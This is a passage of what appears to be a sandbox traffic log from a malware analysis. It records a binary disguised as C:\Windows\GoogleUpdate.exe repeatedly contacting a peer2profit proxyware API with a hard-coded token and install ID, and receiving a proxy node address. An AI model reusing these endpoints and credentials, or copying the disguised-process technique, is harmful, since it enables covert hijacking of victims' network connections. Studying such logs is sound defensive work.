2022-11-24 11:21:13 UTC	35	IN	HTTP/1.1 200 OK Date: Thu, 24 Nov 2022 11:21:13 GMT Content-Type: application/json Content-Length: 131 Connection: close CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 76f1c2809dd7995a-FRA
2022-11-24 11:21:13 UTC	36	IN	Data Raw: 7b 0a 20 20 20 20 22 73 74 61 74 75 73 22 3a 20 22 53 55 43 43 45 53 53 22 2c 0a 20 20 20 20 22 64 61 74 61 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 22 6e 6f 64 65 22 3a 20 22 35 31 2e 31 39 35 2e 37 37 2e 32 30 38 22 2c 0a 20 20 20 20 20 20 20 20 22 70 6f 72 74 22 3a 20 34 34 33 2c 0a 20 20 20 20 20 20 20 20 22 70 65 65 72 5f 69 64 22 3a 20 32 33 39 34 31 37 30 31 38 0a 20 20 20 20 7d 0a 7d Data Ascii: { "status": "SUCCESS", "data": { "node": "51.195.77.208", "port": 443, "peer_id": 239417018 }}

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
53	192.168.2.3	49870	172.66.43.60	443	C:\Windows\GoogleUpdate.exe

Timestamp	kBytes transferred	Direction	Data
2022-11-24 11:21:13 UTC	36	OUT	POST /api/proxy/nodes/get HTTP/1.1 Content-Type: application/json User-Agent: Microsoft Internet Explorer Host: api.peer2profit.com Content-Length: 186 Cache-Control: no-cache
2022-11-24 11:21:13 UTC	36	OUT	Data Raw: 7b 22 74 6f 6b 65 6e 22 3a 20 22 53 44 4b 5f 48 4e 78 4c 69 6f 73 52 4f 62 7a 37 58 54 4f 61 5a 38 62 48 45 34 65 4d 57 41 7a 67 41 76 39 32 36 6a 61 53 48 38 72 37 35 4e 42 76 48 61 55 4c 4b 79 53 39 64 77 75 56 22 2c 20 22 69 6e 73 74 61 6c 6c 69 64 22 3a 20 22 50 32 50 5f 57 49 4e 5f 64 30 36 65 64 36 33 35 2d 36 38 66 36 2d 34 65 39 61 2d 39 35 35 63 2d 34 38 39 39 66 35 66 35 37 62 39 61 5f 6e 65 6f 64 6f 2e 76 69 6d 40 6d 61 69 6c 2e 72 75 22 2c 20 22 76 65 72 22 3a 20 22 30 2e 38 22 2c 20 22 61 67 65 6e 74 22 3a 20 22 31 2e 30 37 2e 30 32 22 7d Data Ascii: {"token": "SDK_HNxLiosRObz7XTOaZ8bHE4eMWAzgAv926jaSH8r75NBvHaULKyS9dwuV", "installid": "P2P_WIN_d06ed635-68f6-4e9a-955c-4899f5f57b9a_neodo.vim@mail.ru", "ver": "0.8", "agent": "1.07.02"}
2022-11-24 11:21:13 UTC	36	IN	HTTP/1.1 200 OK Date: Thu, 24 Nov 2022 11:21:13 GMT Content-Type: application/json Content-Length: 131 Connection: close CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 76f1c283d95f9064-FRA
2022-11-24 11:21:13 UTC	36	IN	Data Raw: 7b 0a 20 20 20 20 22 73 74 61 74 75 73 22 3a 20 22 53 55 43 43 45 53 53 22 2c 0a 20 20 20 20 22 64 61 74 61 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 22 6e 6f 64 65 22 3a 20 22 35 31 2e 31 39 35 2e 37 37 2e 32 30 38 22 2c 0a 20 20 20 20 20 20 20 20 22 70 6f 72 74 22 3a 20 34 34 33 2c 0a 20 20 20 20 20 20 20 20 22 70 65 65 72 5f 69 64 22 3a 20 32 33 39 34 31 37 30 31 38 0a 20 20 20 20 7d 0a 7d Data Ascii: { "status": "SUCCESS", "data": { "node": "51.195.77.208", "port": 443, "peer_id": 239417018 }}

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
54	192.168.2.3	49873	172.66.43.60	443	C:\Windows\GoogleUpdate.exe

Timestamp	kBytes transferred	Direction	Data
2022-11-24 11:21:14 UTC	36	OUT	POST /api/proxy/nodes/get HTTP/1.1 Content-Type: application/json User-Agent: Microsoft Internet Explorer Host: api.peer2profit.com Content-Length: 186 Cache-Control: no-cache
2022-11-24 11:21:14 UTC	37	OUT	Data Raw: 7b 22 74 6f 6b 65 6e 22 3a 20 22 53 44 4b 5f 48 4e 78 4c 69 6f 73 52 4f 62 7a 37 58 54 4f 61 5a 38 62 48 45 34 65 4d 57 41 7a 67 41 76 39 32 36 6a 61 53 48 38 72 37 35 4e 42 76 48 61 55 4c 4b 79 53 39 64 77 75 56 22 2c 20 22 69 6e 73 74 61 6c 6c 69 64 22 3a 20 22 50 32 50 5f 57 49 4e 5f 64 30 36 65 64 36 33 35 2d 36 38 66 36 2d 34 65 39 61 2d 39 35 35 63 2d 34 38 39 39 66 35 66 35 37 62 39 61 5f 6e 65 6f 64 6f 2e 76 69 6d 40 6d 61 69 6c 2e 72 75 22 2c 20 22 76 65 72 22 3a 20 22 30 2e 38 22 2c 20 22 61 67 65 6e 74 22 3a 20 22 31 2e 30 37 2e 30 32 22 7d Data Ascii: {"token": "SDK_HNxLiosRObz7XTOaZ8bHE4eMWAzgAv926jaSH8r75NBvHaULKyS9dwuV", "installid": "P2P_WIN_d06ed635-68f6-4e9a-955c-4899f5f57b9a_neodo.vim@mail.ru", "ver": "0.8", "agent": "1.07.02"}
2022-11-24 11:21:14 UTC	37	IN	HTTP/1.1 200 OK Date: Thu, 24 Nov 2022 11:21:14 GMT Content-Type: application/json Content-Length: 131 Connection: close CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 76f1c2870dcb90c7-FRA
2022-11-24 11:21:14 UTC	37	IN	Data Raw: 7b 0a 20 20 20 20 22 73 74 61 74 75 73 22 3a 20 22 53 55 43 43 45 53 53 22 2c 0a 20 20 20 20 22 64 61 74 61 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 22 6e 6f 64 65 22 3a 20 22 35 31 2e 31 39 35 2e 37 37 2e 32 30 38 22 2c 0a 20 20 20 20 20 20 20 20 22 70 6f 72 74 22 3a 20 34 34 33 2c 0a 20 20 20 20 20 20 20 20 22 70 65 65 72 5f 69 64 22 3a 20 32 33 39 34 31 37 30 31 38 0a 20 20 20 20 7d 0a 7d Data Ascii: { "status": "SUCCESS", "data": { "node": "51.195.77.208", "port": 443, "peer_id": 239417018 }}

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
55	192.168.2.3	49876	172.66.43.60	443	C:\Windows\GoogleUpdate.exe

Timestamp	kBytes transferred	Direction	Data
2022-11-24 11:21:14 UTC	37	OUT	POST /api/proxy/nodes/get HTTP/1.1 Content-Type: application/json User-Agent: Microsoft Internet Explorer Host: api.peer2profit.com Content-Length: 186 Cache-Control: no-cache
2022-11-24 11:21:14 UTC	37	OUT	Data Raw: 7b 22 74 6f 6b 65 6e 22 3a 20 22 53 44 4b 5f 48 4e 78 4c 69 6f 73 52 4f 62 7a 37 58 54 4f 61 5a 38 62 48 45 34 65 4d 57 41 7a 67 41 76 39 32 36 6a 61 53 48 38 72 37 35 4e 42 76 48 61 55 4c 4b 79 53 39 64 77 75 56 22 2c 20 22 69 6e 73 74 61 6c 6c 69 64 22 3a 20 22 50 32 50 5f 57 49 4e 5f 64 30 36 65 64 36 33 35 2d 36 38 66 36 2d 34 65 39 61 2d 39 35 35 63 2d 34 38 39 39 66 35 66 35 37 62 39 61 5f 6e 65 6f 64 6f 2e 76 69 6d 40 6d 61 69 6c 2e 72 75 22 2c 20 22 76 65 72 22 3a 20 22 30 2e 38 22 2c 20 22 61 67 65 6e 74 22 3a 20 22 31 2e 30 37 2e 30 32 22 7d Data Ascii: {"token": "SDK_HNxLiosRObz7XTOaZ8bHE4eMWAzgAv926jaSH8r75NBvHaULKyS9dwuV", "installid": "P2P_WIN_d06ed635-68f6-4e9a-955c-4899f5f57b9a_neodo.vim@mail.ru", "ver": "0.8", "agent": "1.07.02"}
2022-11-24 11:21:14 UTC	37	IN	HTTP/1.1 200 OK Date: Thu, 24 Nov 2022 11:21:14 GMT Content-Type: application/json Content-Length: 131 Connection: close CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 76f1c28a480a6987-FRA
2022-11-24 11:21:14 UTC	38	IN	Data Raw: 7b 0a 20 20 20 20 22 73 74 61 74 75 73 22 3a 20 22 53 55 43 43 45 53 53 22 2c 0a 20 20 20 20 22 64 61 74 61 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 22 6e 6f 64 65 22 3a 20 22 35 31 2e 31 39 35 2e 37 37 2e 32 30 38 22 2c 0a 20 20 20 20 20 20 20 20 22 70 6f 72 74 22 3a 20 34 34 33 2c 0a 20 20 20 20 20 20 20 20 22 70 65 65 72 5f 69 64 22 3a 20 32 33 39 34 31 37 30 31 38 0a 20 20 20 20 7d 0a 7d Data Ascii: { "status": "SUCCESS", "data": { "node": "51.195.77.208", "port": 443, "peer_id": 239417018 }}

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
56	192.168.2.3	49878	172.66.43.60	443	C:\Windows\GoogleUpdate.exe

Timestamp	kBytes transferred	Direction	Data
2022-11-24 11:21:14 UTC	38	OUT	POST /api/proxy/nodes/get HTTP/1.1 Content-Type: application/json User-Agent: Microsoft Internet Explorer Host: api.peer2profit.com Content-Length: 186 Cache-Control: no-cache
2022-11-24 11:21:14 UTC	38	OUT	Data Raw: 7b 22 74 6f 6b 65 6e 22 3a 20 22 53 44 4b 5f 48 4e 78 4c 69 6f 73 52 4f 62 7a 37 58 54 4f 61 5a 38 62 48 45 34 65 4d 57 41 7a 67 41 76 39 32 36 6a 61 53 48 38 72 37 35 4e 42 76 48 61 55 4c 4b 79 53 39 64 77 75 56 22 2c 20 22 69 6e 73 74 61 6c 6c 69 64 22 3a 20 22 50 32 50 5f 57 49 4e 5f 64 30 36 65 64 36 33 35 2d 36 38 66 36 2d 34 65 39 61 2d 39 35 35 63 2d 34 38 39 39 66 35 66 35 37 62 39 61 5f 6e 65 6f 64 6f 2e 76 69 6d 40 6d 61 69 6c 2e 72 75 22 2c 20 22 76 65 72 22 3a 20 22 30 2e 38 22 2c 20 22 61 67 65 6e 74 22 3a 20 22 31 2e 30 37 2e 30 32 22 7d Data Ascii: {"token": "SDK_HNxLiosRObz7XTOaZ8bHE4eMWAzgAv926jaSH8r75NBvHaULKyS9dwuV", "installid": "P2P_WIN_d06ed635-68f6-4e9a-955c-4899f5f57b9a_neodo.vim@mail.ru", "ver": "0.8", "agent": "1.07.02"}
2022-11-24 11:21:15 UTC	38	IN	HTTP/1.1 200 OK Date: Thu, 24 Nov 2022 11:21:15 GMT Content-Type: application/json Content-Length: 131 Connection: close CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 76f1c28c6c008fd6-FRA
2022-11-24 11:21:15 UTC	38	IN	Data Raw: 7b 0a 20 20 20 20 22 73 74 61 74 75 73 22 3a 20 22 53 55 43 43 45 53 53 22 2c 0a 20 20 20 20 22 64 61 74 61 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 22 6e 6f 64 65 22 3a 20 22 35 31 2e 31 39 35 2e 37 37 2e 32 30 38 22 2c 0a 20 20 20 20 20 20 20 20 22 70 6f 72 74 22 3a 20 34 34 33 2c 0a 20 20 20 20 20 20 20 20 22 70 65 65 72 5f 69 64 22 3a 20 32 33 39 34 31 37 30 31 38 0a 20 20 20 20 7d 0a 7d Data Ascii: { "status": "SUCCESS", "data": { "node": "51.195.77.208", "port": 443, "peer_id": 239417018 }}

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
57	192.168.2.3	49881	172.66.43.60	443	C:\Windows\GoogleUpdate.exe

Timestamp	kBytes transferred	Direction	Data
2022-11-24 11:21:15 UTC	38	OUT	POST /api/proxy/nodes/get HTTP/1.1 Content-Type: application/json User-Agent: Microsoft Internet Explorer Host: api.peer2profit.com Content-Length: 186 Cache-Control: no-cache
2022-11-24 11:21:15 UTC	39	OUT	Data Raw: 7b 22 74 6f 6b 65 6e 22 3a 20 22 53 44 4b 5f 48 4e 78 4c 69 6f 73 52 4f 62 7a 37 58 54 4f 61 5a 38 62 48 45 34 65 4d 57 41 7a 67 41 76 39 32 36 6a 61 53 48 38 72 37 35 4e 42 76 48 61 55 4c 4b 79 53 39 64 77 75 56 22 2c 20 22 69 6e 73 74 61 6c 6c 69 64 22 3a 20 22 50 32 50 5f 57 49 4e 5f 64 30 36 65 64 36 33 35 2d 36 38 66 36 2d 34 65 39 61 2d 39 35 35 63 2d 34 38 39 39 66 35 66 35 37 62 39 61 5f 6e 65 6f 64 6f 2e 76 69 6d 40 6d 61 69 6c 2e 72 75 22 2c 20 22 76 65 72 22 3a 20 22 30 2e 38 22 2c 20 22 61 67 65 6e 74 22 3a 20 22 31 2e 30 37 2e 30 32 22 7d Data Ascii: {"token": "SDK_HNxLiosRObz7XTOaZ8bHE4eMWAzgAv926jaSH8r75NBvHaULKyS9dwuV", "installid": "P2P_WIN_d06ed635-68f6-4e9a-955c-4899f5f57b9a_neodo.vim@mail.ru", "ver": "0.8", "agent": "1.07.02"}
2022-11-24 11:21:15 UTC	39	IN	HTTP/1.1 200 OK Date: Thu, 24 Nov 2022 11:21:15 GMT Content-Type: application/json Content-Length: 131 Connection: close CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 76f1c28e8fe7910c-FRA
2022-11-24 11:21:15 UTC	39	IN	Data Raw: 7b 0a 20 20 20 20 22 73 74 61 74 75 73 22 3a 20 22 53 55 43 43 45 53 53 22 2c 0a 20 20 20 20 22 64 61 74 61 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 22 6e 6f 64 65 22 3a 20 22 35 31 2e 31 39 35 2e 37 37 2e 32 30 38 22 2c 0a 20 20 20 20 20 20 20 20 22 70 6f 72 74 22 3a 20 34 34 33 2c 0a 20 20 20 20 20 20 20 20 22 70 65 65 72 5f 69 64 22 3a 20 32 33 39 34 31 37 30 31 38 0a 20 20 20 20 7d 0a 7d Data Ascii: { "status": "SUCCESS", "data": { "node": "51.195.77.208", "port": 443, "peer_id": 239417018 }}

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
58	192.168.2.3	49884	172.66.43.60	443	C:\Windows\GoogleUpdate.exe

Timestamp	kBytes transferred	Direction	Data
2022-11-24 11:21:15 UTC	39	OUT	POST /api/proxy/nodes/get HTTP/1.1 Content-Type: application/json User-Agent: Microsoft Internet Explorer Host: api.peer2profit.com Content-Length: 186 Cache-Control: no-cache
2022-11-24 11:21:15 UTC	39	OUT	Data Raw: 7b 22 74 6f 6b 65 6e 22 3a 20 22 53 44 4b 5f 48 4e 78 4c 69 6f 73 52 4f 62 7a 37 58 54 4f 61 5a 38 62 48 45 34 65 4d 57 41 7a 67 41 76 39 32 36 6a 61 53 48 38 72 37 35 4e 42 76 48 61 55 4c 4b 79 53 39 64 77 75 56 22 2c 20 22 69 6e 73 74 61 6c 6c 69 64 22 3a 20 22 50 32 50 5f 57 49 4e 5f 64 30 36 65 64 36 33 35 2d 36 38 66 36 2d 34 65 39 61 2d 39 35 35 63 2d 34 38 39 39 66 35 66 35 37 62 39 61 5f 6e 65 6f 64 6f 2e 76 69 6d 40 6d 61 69 6c 2e 72 75 22 2c 20 22 76 65 72 22 3a 20 22 30 2e 38 22 2c 20 22 61 67 65 6e 74 22 3a 20 22 31 2e 30 37 2e 30 32 22 7d Data Ascii: {"token": "SDK_HNxLiosRObz7XTOaZ8bHE4eMWAzgAv926jaSH8r75NBvHaULKyS9dwuV", "installid": "P2P_WIN_d06ed635-68f6-4e9a-955c-4899f5f57b9a_neodo.vim@mail.ru", "ver": "0.8", "agent": "1.07.02"}
2022-11-24 11:21:15 UTC	40	IN	HTTP/1.1 200 OK Date: Thu, 24 Nov 2022 11:21:15 GMT Content-Type: application/json Content-Length: 131 Connection: close CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 76f1c2921acd9112-FRA
2022-11-24 11:21:15 UTC	40	IN	Data Raw: 7b 0a 20 20 20 20 22 73 74 61 74 75 73 22 3a 20 22 53 55 43 43 45 53 53 22 2c 0a 20 20 20 20 22 64 61 74 61 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 22 6e 6f 64 65 22 3a 20 22 35 31 2e 31 39 35 2e 37 37 2e 32 30 38 22 2c 0a 20 20 20 20 20 20 20 20 22 70 6f 72 74 22 3a 20 34 34 33 2c 0a 20 20 20 20 20 20 20 20 22 70 65 65 72 5f 69 64 22 3a 20 32 33 39 34 31 37 30 31 38 0a 20 20 20 20 7d 0a 7d Data Ascii: { "status": "SUCCESS", "data": { "node": "51.195.77.208", "port": 443, "peer_id": 239417018 }}

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
59	192.168.2.3	49887	172.66.43.60	443	C:\Windows\GoogleUpdate.exe

Timestamp	kBytes transferred	Direction	Data
2022-11-24 11:21:16 UTC	40	OUT	POST /api/proxy/nodes/get HTTP/1.1 Content-Type: application/json User-Agent: Microsoft Internet Explorer Host: api.peer2profit.com Content-Length: 186 Cache-Control: no-cache
2022-11-24 11:21:16 UTC	40	OUT	Data Raw: 7b 22 74 6f 6b 65 6e 22 3a 20 22 53 44 4b 5f 48 4e 78 4c 69 6f 73 52 4f 62 7a 37 58 54 4f 61 5a 38 62 48 45 34 65 4d 57 41 7a 67 41 76 39 32 36 6a 61 53 48 38 72 37 35 4e 42 76 48 61 55 4c 4b 79 53 39 64 77 75 56 22 2c 20 22 69 6e 73 74 61 6c 6c 69 64 22 3a 20 22 50 32 50 5f 57 49 4e 5f 64 30 36 65 64 36 33 35 2d 36 38 66 36 2d 34 65 39 61 2d 39 35 35 63 2d 34 38 39 39 66 35 66 35 37 62 39 61 5f 6e 65 6f 64 6f 2e 76 69 6d 40 6d 61 69 6c 2e 72 75 22 2c 20 22 76 65 72 22 3a 20 22 30 2e 38 22 2c 20 22 61 67 65 6e 74 22 3a 20 22 31 2e 30 37 2e 30 32 22 7d Data Ascii: {"token": "SDK_HNxLiosRObz7XTOaZ8bHE4eMWAzgAv926jaSH8r75NBvHaULKyS9dwuV", "installid": "P2P_WIN_d06ed635-68f6-4e9a-955c-4899f5f57b9a_neodo.vim@mail.ru", "ver": "0.8", "agent": "1.07.02"}
2022-11-24 11:21:16 UTC	40	IN	HTTP/1.1 200 OK Date: Thu, 24 Nov 2022 11:21:16 GMT Content-Type: application/json Content-Length: 131 Connection: close CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 76f1c2940fe49293-FRA
2022-11-24 11:21:16 UTC	40	IN	Data Raw: 7b 0a 20 20 20 20 22 73 74 61 74 75 73 22 3a 20 22 53 55 43 43 45 53 53 22 2c 0a 20 20 20 20 22 64 61 74 61 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 22 6e 6f 64 65 22 3a 20 22 35 31 2e 31 39 35 2e 37 37 2e 32 30 38 22 2c 0a 20 20 20 20 20 20 20 20 22 70 6f 72 74 22 3a 20 34 34 33 2c 0a 20 20 20 20 20 20 20 20 22 70 65 65 72 5f 69 64 22 3a 20 32 33 39 34 31 37 30 31 38 0a 20 20 20 20 7d 0a 7d Data Ascii: { "status": "SUCCESS", "data": { "node": "51.195.77.208", "port": 443, "peer_id": 239417018 }}

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
6	192.168.2.3	49726	172.66.43.60	443	C:\Windows\GoogleUpdate.exe

Timestamp	kBytes transferred	Direction	Data
2022-11-24 11:20:49 UTC	3	OUT	POST /api/proxy/nodes/get HTTP/1.1 Content-Type: application/json User-Agent: Microsoft Internet Explorer Host: api.peer2profit.com Content-Length: 186 Cache-Control: no-cache
2022-11-24 11:20:49 UTC	4	OUT	Data Raw: 7b 22 74 6f 6b 65 6e 22 3a 20 22 53 44 4b 5f 48 4e 78 4c 69 6f 73 52 4f 62 7a 37 58 54 4f 61 5a 38 62 48 45 34 65 4d 57 41 7a 67 41 76 39 32 36 6a 61 53 48 38 72 37 35 4e 42 76 48 61 55 4c 4b 79 53 39 64 77 75 56 22 2c 20 22 69 6e 73 74 61 6c 6c 69 64 22 3a 20 22 50 32 50 5f 57 49 4e 5f 64 30 36 65 64 36 33 35 2d 36 38 66 36 2d 34 65 39 61 2d 39 35 35 63 2d 34 38 39 39 66 35 66 35 37 62 39 61 5f 6e 65 6f 64 6f 2e 76 69 6d 40 6d 61 69 6c 2e 72 75 22 2c 20 22 76 65 72 22 3a 20 22 30 2e 38 22 2c 20 22 61 67 65 6e 74 22 3a 20 22 31 2e 30 37 2e 30 32 22 7d Data Ascii: {"token": "SDK_HNxLiosRObz7XTOaZ8bHE4eMWAzgAv926jaSH8r75NBvHaULKyS9dwuV", "installid": "P2P_WIN_d06ed635-68f6-4e9a-955c-4899f5f57b9a_neodo.vim@mail.ru", "ver": "0.8", "agent": "1.07.02"}
2022-11-24 11:20:49 UTC	4	IN	HTTP/1.1 200 OK Date: Thu, 24 Nov 2022 11:20:49 GMT Content-Type: application/json Content-Length: 131 Connection: close CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 76f1c1ebdbe79b34-FRA
2022-11-24 11:20:49 UTC	4	IN	Data Raw: 7b 0a 20 20 20 20 22 73 74 61 74 75 73 22 3a 20 22 53 55 43 43 45 53 53 22 2c 0a 20 20 20 20 22 64 61 74 61 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 22 6e 6f 64 65 22 3a 20 22 35 31 2e 31 39 35 2e 37 37 2e 32 30 38 22 2c 0a 20 20 20 20 20 20 20 20 22 70 6f 72 74 22 3a 20 34 34 33 2c 0a 20 20 20 20 20 20 20 20 22 70 65 65 72 5f 69 64 22 3a 20 32 33 39 34 31 37 30 31 38 0a 20 20 20 20 7d 0a 7d Data Ascii: { "status": "SUCCESS", "data": { "node": "51.195.77.208", "port": 443, "peer_id": 239417018 }}

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
60	192.168.2.3	49890	172.66.43.60	443	C:\Windows\GoogleUpdate.exe

Timestamp	kBytes transferred	Direction	Data
2022-11-24 11:21:16 UTC	41	OUT	POST /api/proxy/nodes/get HTTP/1.1 Content-Type: application/json User-Agent: Microsoft Internet Explorer Host: api.peer2profit.com Content-Length: 186 Cache-Control: no-cache
2022-11-24 11:21:16 UTC	41	OUT	Data Raw: 7b 22 74 6f 6b 65 6e 22 3a 20 22 53 44 4b 5f 48 4e 78 4c 69 6f 73 52 4f 62 7a 37 58 54 4f 61 5a 38 62 48 45 34 65 4d 57 41 7a 67 41 76 39 32 36 6a 61 53 48 38 72 37 35 4e 42 76 48 61 55 4c 4b 79 53 39 64 77 75 56 22 2c 20 22 69 6e 73 74 61 6c 6c 69 64 22 3a 20 22 50 32 50 5f 57 49 4e 5f 64 30 36 65 64 36 33 35 2d 36 38 66 36 2d 34 65 39 61 2d 39 35 35 63 2d 34 38 39 39 66 35 66 35 37 62 39 61 5f 6e 65 6f 64 6f 2e 76 69 6d 40 6d 61 69 6c 2e 72 75 22 2c 20 22 76 65 72 22 3a 20 22 30 2e 38 22 2c 20 22 61 67 65 6e 74 22 3a 20 22 31 2e 30 37 2e 30 32 22 7d Data Ascii: {"token": "SDK_HNxLiosRObz7XTOaZ8bHE4eMWAzgAv926jaSH8r75NBvHaULKyS9dwuV", "installid": "P2P_WIN_d06ed635-68f6-4e9a-955c-4899f5f57b9a_neodo.vim@mail.ru", "ver": "0.8", "agent": "1.07.02"}
2022-11-24 11:21:16 UTC	41	IN	HTTP/1.1 200 OK Date: Thu, 24 Nov 2022 11:21:16 GMT Content-Type: application/json Content-Length: 131 Connection: close CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 76f1c296ebf9bbb3-FRA
2022-11-24 11:21:16 UTC	41	IN	Data Raw: 7b 0a 20 20 20 20 22 73 74 61 74 75 73 22 3a 20 22 53 55 43 43 45 53 53 22 2c 0a 20 20 20 20 22 64 61 74 61 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 22 6e 6f 64 65 22 3a 20 22 35 31 2e 31 39 35 2e 37 37 2e 32 30 38 22 2c 0a 20 20 20 20 20 20 20 20 22 70 6f 72 74 22 3a 20 34 34 33 2c 0a 20 20 20 20 20 20 20 20 22 70 65 65 72 5f 69 64 22 3a 20 32 33 39 34 31 37 30 31 38 0a 20 20 20 20 7d 0a 7d Data Ascii: { "status": "SUCCESS", "data": { "node": "51.195.77.208", "port": 443, "peer_id": 239417018 }}

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
61	192.168.2.3	49892	172.66.43.60	443	C:\Windows\GoogleUpdate.exe

Timestamp	kBytes transferred	Direction	Data
2022-11-24 11:21:16 UTC	41	OUT	POST /api/proxy/nodes/get HTTP/1.1 Content-Type: application/json User-Agent: Microsoft Internet Explorer Host: api.peer2profit.com Content-Length: 186 Cache-Control: no-cache
2022-11-24 11:21:16 UTC	41	OUT	Data Raw: 7b 22 74 6f 6b 65 6e 22 3a 20 22 53 44 4b 5f 48 4e 78 4c 69 6f 73 52 4f 62 7a 37 58 54 4f 61 5a 38 62 48 45 34 65 4d 57 41 7a 67 41 76 39 32 36 6a 61 53 48 38 72 37 35 4e 42 76 48 61 55 4c 4b 79 53 39 64 77 75 56 22 2c 20 22 69 6e 73 74 61 6c 6c 69 64 22 3a 20 22 50 32 50 5f 57 49 4e 5f 64 30 36 65 64 36 33 35 2d 36 38 66 36 2d 34 65 39 61 2d 39 35 35 63 2d 34 38 39 39 66 35 66 35 37 62 39 61 5f 6e 65 6f 64 6f 2e 76 69 6d 40 6d 61 69 6c 2e 72 75 22 2c 20 22 76 65 72 22 3a 20 22 30 2e 38 22 2c 20 22 61 67 65 6e 74 22 3a 20 22 31 2e 30 37 2e 30 32 22 7d Data Ascii: {"token": "SDK_HNxLiosRObz7XTOaZ8bHE4eMWAzgAv926jaSH8r75NBvHaULKyS9dwuV", "installid": "P2P_WIN_d06ed635-68f6-4e9a-955c-4899f5f57b9a_neodo.vim@mail.ru", "ver": "0.8", "agent": "1.07.02"}
2022-11-24 11:21:16 UTC	42	IN	HTTP/1.1 200 OK Date: Thu, 24 Nov 2022 11:21:16 GMT Content-Type: application/json Content-Length: 131 Connection: close CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 76f1c298bda390d4-FRA
2022-11-24 11:21:16 UTC	42	IN	Data Raw: 7b 0a 20 20 20 20 22 73 74 61 74 75 73 22 3a 20 22 53 55 43 43 45 53 53 22 2c 0a 20 20 20 20 22 64 61 74 61 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 22 6e 6f 64 65 22 3a 20 22 35 31 2e 31 39 35 2e 37 37 2e 32 30 38 22 2c 0a 20 20 20 20 20 20 20 20 22 70 6f 72 74 22 3a 20 34 34 33 2c 0a 20 20 20 20 20 20 20 20 22 70 65 65 72 5f 69 64 22 3a 20 32 33 39 34 31 37 30 31 38 0a 20 20 20 20 7d 0a 7d Data Ascii: { "status": "SUCCESS", "data": { "node": "51.195.77.208", "port": 443, "peer_id": 239417018 }}

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
62	192.168.2.3	49895	172.66.43.60	443	C:\Windows\GoogleUpdate.exe

Timestamp	kBytes transferred	Direction	Data
2022-11-24 11:21:17 UTC	42	OUT	POST /api/proxy/nodes/get HTTP/1.1 Content-Type: application/json User-Agent: Microsoft Internet Explorer Host: api.peer2profit.com Content-Length: 186 Cache-Control: no-cache
2022-11-24 11:21:17 UTC	42	OUT	Data Raw: 7b 22 74 6f 6b 65 6e 22 3a 20 22 53 44 4b 5f 48 4e 78 4c 69 6f 73 52 4f 62 7a 37 58 54 4f 61 5a 38 62 48 45 34 65 4d 57 41 7a 67 41 76 39 32 36 6a 61 53 48 38 72 37 35 4e 42 76 48 61 55 4c 4b 79 53 39 64 77 75 56 22 2c 20 22 69 6e 73 74 61 6c 6c 69 64 22 3a 20 22 50 32 50 5f 57 49 4e 5f 64 30 36 65 64 36 33 35 2d 36 38 66 36 2d 34 65 39 61 2d 39 35 35 63 2d 34 38 39 39 66 35 66 35 37 62 39 61 5f 6e 65 6f 64 6f 2e 76 69 6d 40 6d 61 69 6c 2e 72 75 22 2c 20 22 76 65 72 22 3a 20 22 30 2e 38 22 2c 20 22 61 67 65 6e 74 22 3a 20 22 31 2e 30 37 2e 30 32 22 7d Data Ascii: {"token": "SDK_HNxLiosRObz7XTOaZ8bHE4eMWAzgAv926jaSH8r75NBvHaULKyS9dwuV", "installid": "P2P_WIN_d06ed635-68f6-4e9a-955c-4899f5f57b9a_neodo.vim@mail.ru", "ver": "0.8", "agent": "1.07.02"}
2022-11-24 11:21:17 UTC	42	IN	HTTP/1.1 200 OK Date: Thu, 24 Nov 2022 11:21:17 GMT Content-Type: application/json Content-Length: 131 Connection: close CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 76f1c29aadf9bbeb-FRA
2022-11-24 11:21:17 UTC	42	IN	Data Raw: 7b 0a 20 20 20 20 22 73 74 61 74 75 73 22 3a 20 22 53 55 43 43 45 53 53 22 2c 0a 20 20 20 20 22 64 61 74 61 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 22 6e 6f 64 65 22 3a 20 22 35 31 2e 31 39 35 2e 37 37 2e 32 30 38 22 2c 0a 20 20 20 20 20 20 20 20 22 70 6f 72 74 22 3a 20 34 34 33 2c 0a 20 20 20 20 20 20 20 20 22 70 65 65 72 5f 69 64 22 3a 20 32 33 39 34 31 37 30 31 38 0a 20 20 20 20 7d 0a 7d Data Ascii: { "status": "SUCCESS", "data": { "node": "51.195.77.208", "port": 443, "peer_id": 239417018 }}

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
63	192.168.2.3	49897	172.66.43.60	443	C:\Windows\GoogleUpdate.exe

Timestamp	kBytes transferred	Direction	Data
2022-11-24 11:21:17 UTC	43	OUT	POST /api/proxy/nodes/get HTTP/1.1 Content-Type: application/json User-Agent: Microsoft Internet Explorer Host: api.peer2profit.com Content-Length: 186 Cache-Control: no-cache
